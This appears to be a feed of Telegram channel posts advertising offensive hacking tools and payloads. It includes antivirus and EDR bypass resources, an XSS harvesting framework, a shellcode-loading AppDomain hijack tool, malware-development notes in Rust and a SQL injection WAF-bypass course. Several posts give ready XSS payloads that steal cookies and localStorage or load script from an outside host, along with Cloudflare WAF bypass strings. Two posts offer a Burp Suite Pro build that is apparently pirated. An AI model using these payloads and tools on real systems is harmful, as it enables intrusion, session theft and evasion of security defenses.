BypassAV

This map lists the essential techniques to bypass anti-virus and EDR

💬
as a reminder: it is highly recommended to read the articles related to manual techniques rather than using open source tools which are more likely to be suspected by the anti-virus because of IOSs

😸 Github

⬇️ Download
🔒 BugCod3

#Pentest #AV #Bypass
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕷 ezXSS 🕷

ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.

💬
ezXSS is a tool that is designed to help find and exploit cross-site noscripting (XSS) vulnerabilities. One of the key features of ezXSS is its ability to identify and exploit blind XSS vulnerabilities, which can be difficult to find using traditional methods.

📊 Features:
⚪️ Easy to use dashboard with settings, statistics, payloads, view/share/search reports
⚪️ 🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
⚪️ Manage unlimited users with permissions to personal payloads & their reports
⚪️ Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
⚪️ Custom extra javanoscript payloads
⚪️ Custom payload links to distinguish insert points
⚪️ Extract additional pages, block, whitelist and other filters
⚪️ Secure your login with Two-factor (2FA)
⚪️ The following information can be collected on a vulnerable page:
⚫️ The URL of the page
⚫️ IP Address
⚫️ Any page referer (or share referer)
⚫️ The User-Agent
⚫️ All Non-HTTP-Only Cookies
⚫️ All Locale Storage
⚫️ All Session Storage
⚫️ Full HTML DOM source of the page
⚫️ Page origin
⚫️ Time of execution
⚫️ Payload URL
⚫️ Screenshot of the page
⚫️ Extract additional defined pages
⚪️ Triggers in all browsers, starting from Chrome 3+, IE 8+, Firefox 4+, Opera 10.5+, Safari 4+
⚪️ much much more, and, its just ez :-)

Required:
⚪️ Server or shared web hosting with PHP 7.1 or up
⚪️ Domain name (consider a short one or check out shortboost)
⚪️ SSL Certificate to test on https websites (consider Cloudflare or Let's Encrypt for a free SSL)

Installation:
⚪️ ezXSS is ez to install with Apache, NGINX or Docker
⚪️ visit the wiki for installation instructions.

😸 Github

⬇️ Download
🔒 BugCod3

#PHP #XSS #Blind #Pentest
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔍 Chiasmodon 🔍

💬
Chiasmodon is an OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about target domain. Its primary functionality revolves around searching for domain-related data, including domain emails, domain credentials (usernames and passwords), CIDRs (Classless Inter-Domain Routing), ASNs (Autonomous System Numbers), and subdomains. the tool allows users to search by domain, CIDR, ASN, email, username, password, or Google Play application ID.

📊 Features:
🌐 Domain: Conduct targeted searches by specifying a domain name to gather relevant information related to the domain.
🎮 Google Play Application: Search for information related to a specific application on the Google Play Store by providing the application ID.
🔎 CIDR and 🔢🔢ASN: Explore CIDR blocks and Autonomous System Numbers (ASNs) associated with the target domain to gain insights into network infrastructure and potential vulnerabilities.
✉️ Email, 👤Username, 🔒 Password: Conduct searches based on email, username, or password to identify potential security risks or compromised credentials.
🌍 Country: Sort and filter search results by country to gain insights into the geographic distribution of the identified information.
📋 Output Customization: Choose the desired output format (text, JSON, or CSV) and specify the filename to save the search results.
⚙️ Additional Options: The tool offers various additional options, such as viewing different result types (credentials, URLs, subdomains, emails, passwords, usernames, or applications), setting API tokens, specifying timeouts, limiting results, and more.

🔼 Install:

pip install chiasmodon

💻 Usage:

chiasmodon_cli.py -h

😸 Github

⬇️ Download
🔒 BugCod3

#OSINT #BugBounty #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Learn the basics of burpsuite. Start using Burp with web applications.

⬇️ Download

#Burpsuite #Kalilinux #Cybersecurity
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

💜 knoxnl 💜

💬
This is a python wrapper around the amazing KNOXSS API by Brute Logic. To use this tool (and the underlying API), you must have a valid KNOXSS API key. Don't have one? Go visit https://knoxss.me and subscribe! This was inspired by the "knoxssme" tool by @edoardottt2, but developed to allow for greater options.

🔼 Installation:
NOTE: If you already have a `config.yml` file, it will not be overwritten. The file `config.yml.NEW` will be created in the same directory. If you need the new config, remove `config.yml` and rename `config.yml.NEW` back to `config.yml`.

pip install knoxnl

💻 Examples:

knoxnl -i "https://brutelogic.com.br/xss.php"

Or a file of URLs:

knoxnl -i ~/urls.txt

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Scanner #XSS #Knoxnl
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Here's another Blind XSS vector!

1"`/import(src)'<Script/Src=//X55.is?1=00><Img/OnLoad='`

Where 00 is your unique KNOXSS id.

If it fails with <Script it might pop with <Img in a multi reflection scenario!

#XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Payload:

"%27%22()%26%25%3Cyes%3E%3C%2Fnoscript%3E%3Cnoscript%3Ealert%28document.domain%29%3C%2Fnoscript%3E"

#XSS
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Version 1.0.0 is available now

pip3 install -U chiasmodon

#OSINT #CyberSecurity #password
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Rust for Malware Development

💬
Hello Nerds, This Repo is about using Rust for malware development and for low level stuffs.

👁‍🗨 Basics:
To Learn Rust -> Rust Book

Windows API [old]-(winapi)-> WinAPI

Windows API (by Official Microsoft) -> WinAPI

ntapi Crate -> NtAPI

Windows Internels -> Link

RedTeam Notes -> Link

WinAPI Imports to Test and Execute these Codes..

[dependencies]
winapi = { version = "0.3", features = ["winuser", "debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
ntapi = "0.4.1"
user32-sys = "0.2.0"

Tips for Rust Beginner: save this dependencies in Cargo.toml File.

😸 Github

⬇️ Download
🔒 BugCod3

#Rust #Malware #Dev
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Parameter: invitedby=

Payload=%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3E

Full_url= https://site. com/?invitedby=%22%3E%3Cnoscript%3Ealert(document.cookie)%3C/noscript%3E

#XSS #BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|noscript|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' | xsschecker -match '<sCript>confirm(1)</sCript>, <noscript>confirm(1)</noscript>' -vuln

⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )
🔒 LearnExploit ( BOT )

#XSS #BugBounty #Oneliner #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👁 Burpsuite Pro 👁

🔥 v2024.3.1

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🌐 Ominis OSINT: Secure Web-Search 🌐

📊 Features:
🚀 Enhanced User Interface: Enjoy a redesigned interface for a seamless experience, suitable for both novice and experienced users.
🔎 Expanded Digital Reconnaissance: Conduct thorough investigations with advanced tools to gather and analyze publicly available information from diverse online sources.
💡 Threading Optimization: Experience faster execution times with optimized threading, improving efficiency and reducing waiting periods during username searches.
📊 Detailed Results: Gain comprehensive insights from search results, including detailed information extracted from various sources such as social profiles, mentions, and potential forum links.
⚙️ Proxy Validation: The tool validates proxies for secure and efficient web requests, ensuring anonymity and privacy during the search process. This feature enhances the reliability of the search results by utilizing a pool of validated proxies, mitigating the risk of IP blocking and ensuring seamless execution of the search queries.
🕵️‍♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
🛡 Randomized Proxy Agents: In addition to proxy validation, the tool utilizes randomized proxy agents for each request, further enhancing user anonymity. By rotating through a pool of proxies, the tool reduces the chances of being tracked or identified by websites, thus safeguarding user privacy throughout the reconnaissance process.
🔍 Username Search: Searches a list of URLs for a specific username. Utilizes threading for parallel execution. Provides detailed results with URL and HTTP status code.

🔼 Installation:

cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Search #Engin #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👁 Burpsuite Pro 👁

🔥 v2024.3.1.2

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🤖 AutoAppDomainHijack 🤖

💬
Tools to automate finding AppDomain hijacks and generating payloads from shellcode.

👤 HijackHunt:
Run this tool on the target. It will search recursively in the C:\ directory for .NET managed `.exe`s and test if the folder is writeable - indicating that the PE is AppDomainHijack-able.

💡 AutoDomainHijack:
💻 Usage:

  AutoDomainHijack.exe (--version | -h | --help)

📊 Options:

-t, --target-name=<target-name>  Name of the target managed .exe to hijack.
-n, --hijack-name=<hijack-name>  Name of the hijacker .dll.
-u, --url=<url>                  URL of the remote shellcode to run.
-f, --file=<file>                File containing the shellcode to embed.
-o, --output=<output>            Full directory to write files to.
-e, --etw=<etw>                  Disable ETW. [default: true]
--version                    Prints version
-h, --help                       Show help message

📂 Build:

nimble build

😸 Github

⬇️ Download
🔒 BugCod3

#Hijack #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🔍 MultCheck 🔍

💬
MultCheck is a malware-analysis tool that can be used to test the detection of a file by multiple AV engines.
It is designed to be easy to use, and to be able to test multiple AV engines. It is also designed to be easy to extend, and to be able to add custom AV engines.

🔼 Installation:
Run go build under the root directory of the project.
OR

cd src
# Build for Windows
## 64-bit
GOOS=windows GOARCH=amd64 go build -o ../bin/multcheck_x64.exe main.go

## 32-bit
GOOS=windows GOARCH=386 go build -o ../bin/multcheck_x32.exe main.go

💻 Usage:

MultCheck accepts a target file as an argument: ./multcheck <target_file>

Different built-in scanners can be used by specifying the -scanner flag: ./multcheck -scanner <scanner_name> <target_file>

Custom scanners can be added by creating a configuration file and providing the path to the file through the -scanner flag: ./multcheck -scanner <path_to_config_file> <target_file>

👤 Supported Scanners:
💻 Windows Defender (winDef)

😸 Github

⬇️ Download
🔒 BugCod3

#GO #Malware #Analysis #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :'%3e%3cnoscript%3ealert(5*5)%3c%2fnoscript%3eejj4sbx5w4o

#BugBounty #Tips #Payload
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CloudFlare Payload

<noscript%0Aonauxclick=0;[1].some(confirm)//
<noscript onload=alert%26%230000000040"")>
<noscript onx=() onload=(confirm)(1)>
<noscript onx=() onload=(confirm)(document.cookie)>
<noscript onx=() onload=(confirm)(JSON.stringify(localStorage))>

#Payload #Cloudflare #Pentest
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/A3l3_KA4

Advanced SQL Injection for AWAE

Goal is to master SQL Injection Discovery, Detection and Exploitation

📊 Table of Content:
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using AND/OR 0 in SQLi
- The Alternative ways of using NULL in SQLi
- The Alternative way of using WhiteSpace in SQLi
- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi

AND...

😸 Github

⬇️ Download
🔒 BugCod3

#Sql #Injection #AWAE
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3